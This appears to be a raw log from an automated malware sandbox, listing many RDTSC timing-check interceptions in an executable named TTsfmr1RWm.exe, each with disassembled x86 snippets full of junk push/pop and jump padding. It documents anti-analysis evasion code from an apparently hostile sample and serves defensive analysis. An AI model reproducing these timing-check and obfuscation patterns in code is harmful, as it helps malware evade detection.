Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 51C0AC0 second address: 51C0AC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 51C0AC4 second address: 51C0ACA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 51C0ACA second address: 51C0BCF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91A0CE39AEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F91A0CE39AEh 0x00000012 sbb ecx, 36C53CC8h 0x00000018 jmp 00007F91A0CE39ABh 0x0000001d popfd 0x0000001e mov esi, 6DA8D23Fh 0x00000023 popad 0x00000024 xchg eax, esi 0x00000025 jmp 00007F91A0CE39B2h 0x0000002a push eax 0x0000002b jmp 00007F91A0CE39ABh 0x00000030 xchg eax, esi 0x00000031 pushad 0x00000032 pushad 0x00000033 mov di, si 0x00000036 mov bl, ah 0x00000038 popad 0x00000039 jmp 00007F91A0CE39B3h 0x0000003e popad 0x0000003f mov esi, dword ptr [ebp+0Ch] 0x00000042 pushad 0x00000043 pushfd 0x00000044 jmp 00007F91A0CE39B4h 0x00000049 xor cl, FFFFFFE8h 0x0000004c jmp 00007F91A0CE39ABh 0x00000051 popfd 0x00000052 mov ax, BFDFh 0x00000056 popad 0x00000057 test esi, esi 0x00000059 jmp 00007F91A0CE39B2h 0x0000005e je 00007F92124711DAh 0x00000064 jmp 00007F91A0CE39B0h 0x00000069 cmp dword ptr [769B459Ch], 05h 0x00000070 jmp 00007F91A0CE39B0h 0x00000075 je 00007F921248928Dh 0x0000007b push eax 0x0000007c push edx 0x0000007d jmp 00007F91A0CE39B7h 0x00000082 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 51C0CB2 second address: 51C0CDF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91A0CEF8ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a pushad 0x0000000b movzx esi, dx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F91A0CEF8B7h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 64BED1F second address: 64BED32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b jnc 00007F91A0CE39A8h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 64CADD5 second address: 64CADDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 64CADDB second address: 64CADE3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 64CADE3 second address: 64CADEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F91A0CEF8A6h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 64CADEF second address: 64CADF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 64CADF3 second address: 64CADFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 64CE207 second address: 634D971 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F91A0CE39A6h 0x00000009 jnp 00007F91A0CE39A6h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 xor dword ptr [esp], 6712F9BAh 0x00000019 pushad 0x0000001a add ecx, 00B09A44h 0x00000020 jnp 00007F91A0CE39A9h 0x00000026 popad 0x00000027 push dword ptr [ebp+122D0BB9h] 0x0000002d jmp 00007F91A0CE39B3h 0x00000032 call dword ptr [ebp+122D20ECh] 0x00000038 pushad 0x00000039 mov dword ptr [ebp+122D20B8h], edx 0x0000003f xor eax, eax 0x00000041 jmp 00007F91A0CE39AFh 0x00000046 mov edx, dword ptr [esp+28h] 0x0000004a jmp 00007F91A0CE39B9h 0x0000004f mov dword ptr [ebp+122D3775h], eax 0x00000055 mov dword ptr [ebp+122D2130h], esi 0x0000005b mov dword ptr [ebp+122D20B8h], edi 0x00000061 mov esi, 0000003Ch 0x00000066 cld 0x00000067 add esi, dword ptr [esp+24h] 0x0000006b xor dword ptr [ebp+122D20B8h], edi 0x00000071 lodsw 0x00000073 mov dword ptr [ebp+122D20E2h], ebx 0x00000079 add eax, dword ptr [esp+24h] 0x0000007d or dword ptr [ebp+122D2EF7h], ebx 0x00000083 mov ebx, dword ptr [esp+24h] 0x00000087 mov dword ptr [ebp+122D20B8h], edx 0x0000008d push eax 0x0000008e pushad 0x0000008f pushad 0x00000090 jbe 00007F91A0CE39A6h 0x00000096 push eax 0x00000097 push edx 0x00000098 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 64CE416 second address: 64CE41F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 64CE41F second address: 64CE423 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 64CE423 second address: 64CE4A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xor dword ptr [esp], 7D2E72D0h 0x0000000e mov si, di 0x00000011 push 00000003h 0x00000013 pushad 0x00000014 jl 00007F91A0CEF8A9h 0x0000001a mov di, bx 0x0000001d movzx esi, cx 0x00000020 popad 0x00000021 mov cl, bl 0x00000023 push 00000000h 0x00000025 push 00000000h 0x00000027 push ebp 0x00000028 call 00007F91A0CEF8A8h 0x0000002d pop ebp 0x0000002e mov dword ptr [esp+04h], ebp 0x00000032 add dword ptr [esp+04h], 0000001Bh 0x0000003a inc ebp 0x0000003b push ebp 0x0000003c ret 0x0000003d pop ebp 0x0000003e ret 0x0000003f mov cx, EAF0h 0x00000043 push 00000003h 0x00000045 push 00000000h 0x00000047 push ebx 0x00000048 call 00007F91A0CEF8A8h 0x0000004d pop ebx 0x0000004e mov dword ptr [esp+04h], ebx 0x00000052 add dword ptr [esp+04h], 0000001Ah 0x0000005a inc ebx 0x0000005b push ebx 0x0000005c ret 0x0000005d pop ebx 0x0000005e ret 0x0000005f mov esi, dword ptr [ebp+122D3699h] 0x00000065 push BB2F4A7Ch 0x0000006a push eax 0x0000006b push edx 0x0000006c push eax 0x0000006d push edx 0x0000006e push eax 0x0000006f push edx 0x00000070 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 64CE4A4 second address: 64CE4A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 64CE4A8 second address: 64CE4AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 64CE4AC second address: 64CE4B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 64CE4B2 second address: 64CE4F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91A0CEF8B0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 04D0B584h 0x00000010 xor dword ptr [ebp+122D2F6Eh], esi 0x00000016 lea ebx, dword ptr [ebp+1245410Ah] 0x0000001c mov edi, dword ptr [ebp+122D37D5h] 0x00000022 mov ecx, dword ptr [ebp+122D36B1h] 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b jl 00007F91A0CEF8A8h 0x00000031 push esi 0x00000032 pop esi 0x00000033 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 64CE542 second address: 64CE5A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jbe 00007F91A0CE39ACh 0x0000000b jg 00007F91A0CE39A6h 0x00000011 popad 0x00000012 mov dword ptr [esp], eax 0x00000015 mov dword ptr [ebp+122D20BDh], ebx 0x0000001b push 00000000h 0x0000001d mov cl, 21h 0x0000001f call 00007F91A0CE39A9h 0x00000024 jp 00007F91A0CE39AEh 0x0000002a push eax 0x0000002b jmp 00007F91A0CE39B4h 0x00000030 mov eax, dword ptr [esp+04h] 0x00000034 jmp 00007F91A0CE39B1h 0x00000039 mov eax, dword ptr [eax] 0x0000003b pushad 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 64CE5A9 second address: 64CE5AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 64CE5AD second address: 64CE62D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91A0CE39B3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jo 00007F91A0CE39ACh 0x0000000f jnp 00007F91A0CE39A6h 0x00000015 popad 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a jg 00007F91A0CE39B6h 0x00000020 pushad 0x00000021 pushad 0x00000022 popad 0x00000023 jmp 00007F91A0CE39ACh 0x00000028 popad 0x00000029 pop eax 0x0000002a mov edi, dword ptr [ebp+122D3809h] 0x00000030 jmp 00007F91A0CE39B4h 0x00000035 push 00000003h 0x00000037 mov si, BDE5h 0x0000003b push 00000000h 0x0000003d mov esi, dword ptr [ebp+122D3835h] 0x00000043 stc 0x00000044 push 00000003h 0x00000046 push edx 0x00000047 mov esi, dword ptr [ebp+122D36E5h] 0x0000004d pop ecx 0x0000004e call 00007F91A0CE39A9h 0x00000053 push ecx 0x00000054 push eax 0x00000055 push edx 0x00000056 pushad 0x00000057 popad 0x00000058 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 64CE62D second address: 64CE631 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 64CE631 second address: 64CE65D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 pushad 0x00000009 jbe 00007F91A0CE39A8h 0x0000000f pushad 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 jmp 00007F91A0CE39AEh 0x00000017 popad 0x00000018 popad 0x00000019 mov eax, dword ptr [esp+04h] 0x0000001d push edx 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 64CE65D second address: 64CE663 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 64CE663 second address: 64CE6A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 mov eax, dword ptr [eax] 0x00000008 jns 00007F91A0CE39B9h 0x0000000e pushad 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 jmp 00007F91A0CE39AFh 0x00000016 popad 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e jnp 00007F91A0CE39A6h 0x00000024 jmp 00007F91A0CE39AEh 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 64CE6A0 second address: 64CE6A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 64CE6A6 second address: 64CE6DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91A0CE39AFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop eax 0x0000000c jnl 00007F91A0CE39ACh 0x00000012 add edx, dword ptr [ebp+122D36BDh] 0x00000018 lea ebx, dword ptr [ebp+12454115h] 0x0000001e mov ecx, esi 0x00000020 xchg eax, ebx 0x00000021 js 00007F91A0CE39C4h 0x00000027 push eax 0x00000028 push edx 0x00000029 jng 00007F91A0CE39A6h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 64EE3C2 second address: 64EE3C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 64EE3C6 second address: 64EE3D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 64EE3D0 second address: 64EE3D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 64B66F7 second address: 64B6701 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F91A0CE39A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 64EC1E9 second address: 64EC1EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 64EC1EF second address: 64EC1F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 64EC1F5 second address: 64EC1FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 64EC1FC second address: 64EC201 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 64EC35E second address: 64EC362 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 64EC615 second address: 64EC61B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 64EC79A second address: 64EC7A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 64ECC0B second address: 64ECC0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 64ECC0F second address: 64ECC2F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91A0CEF8B0h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jl 00007F91A0CEF8A6h 0x00000012 push edx 0x00000013 pop edx 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 64ECC2F second address: 64ECC62 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F91A0CE39AAh 0x00000008 pushad 0x00000009 popad 0x0000000a push edi 0x0000000b pop edi 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jbe 00007F91A0CE39ACh 0x00000015 js 00007F91A0CE39A6h 0x0000001b jno 00007F91A0CE39AEh 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 popad 0x00000025 jnc 00007F91A0CE39A6h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 64ECE02 second address: 64ECE06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 64ECE06 second address: 64ECE0B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 64ECE0B second address: 64ECE1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push esi 0x00000007 pop esi 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 64ECE1A second address: 64ECE20 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 64ECF55 second address: 64ECF59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 64ECF59 second address: 64ECF63 instructions: 0x00000000 rdtsc 0x00000002 js 00007F91A0CE39A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 64ED0CA second address: 64ED0CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 64ED0CE second address: 64ED0EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F91A0CE39B7h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 64ED0EB second address: 64ED0FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F91A0CEF8AEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 64ED4CA second address: 64ED4EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91A0CE39B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007F91A0CE39BCh 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 64EDD3A second address: 64EDD53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F91A0CEF8B4h 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 64EDD53 second address: 64EDD6F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91A0CE39B7h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 64EDEF2 second address: 64EDEF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 64EDEF6 second address: 64EDEFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 64EDEFC second address: 64EDF02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 64EDF02 second address: 64EDF1E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jg 00007F91A0CE39A6h 0x0000000b ja 00007F91A0CE39A6h 0x00000011 jg 00007F91A0CE39A6h 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 64EDF1E second address: 64EDF28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F91A0CEF8A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 64EE1F1 second address: 64EE1F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 64EE1F7 second address: 64EE1FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 64F0DD1 second address: 64F0DEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ebx 0x00000006 push eax 0x00000007 pop eax 0x00000008 jmp 00007F91A0CE39B0h 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 64F5260 second address: 64F5265 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 64F5265 second address: 64F526A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 64F5368 second address: 64F5376 instructions: 0x00000000 rdtsc 0x00000002 js 00007F91A0CEF8A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 64F5376 second address: 64F537A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 64F42D2 second address: 64F42DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F91A0CEF8A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 64F9219 second address: 64F9226 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F91A0CE39A6h 0x0000000a push esi 0x0000000b pop esi 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 64F9226 second address: 64F922C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 64F922C second address: 64F9230 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 64F9393 second address: 64F93CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F91A0CEF8B9h 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F91A0CEF8B4h 0x00000013 push edx 0x00000014 pop edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 64F93CB second address: 64F93DB instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F91A0CE39A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 64F93DB second address: 64F93DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 64F96CC second address: 64F96D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 64F96D2 second address: 64F96D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 64F9954 second address: 64F995D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 64FBF92 second address: 64FBFBD instructions: 0x00000000 rdtsc 0x00000002 jne 00007F91A0CEF8A8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jmp 00007F91A0CEF8B9h 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 64FBFBD second address: 64FBFC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 64FC096 second address: 64FC0B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F91A0CEF8B6h 0x00000009 rdtsc
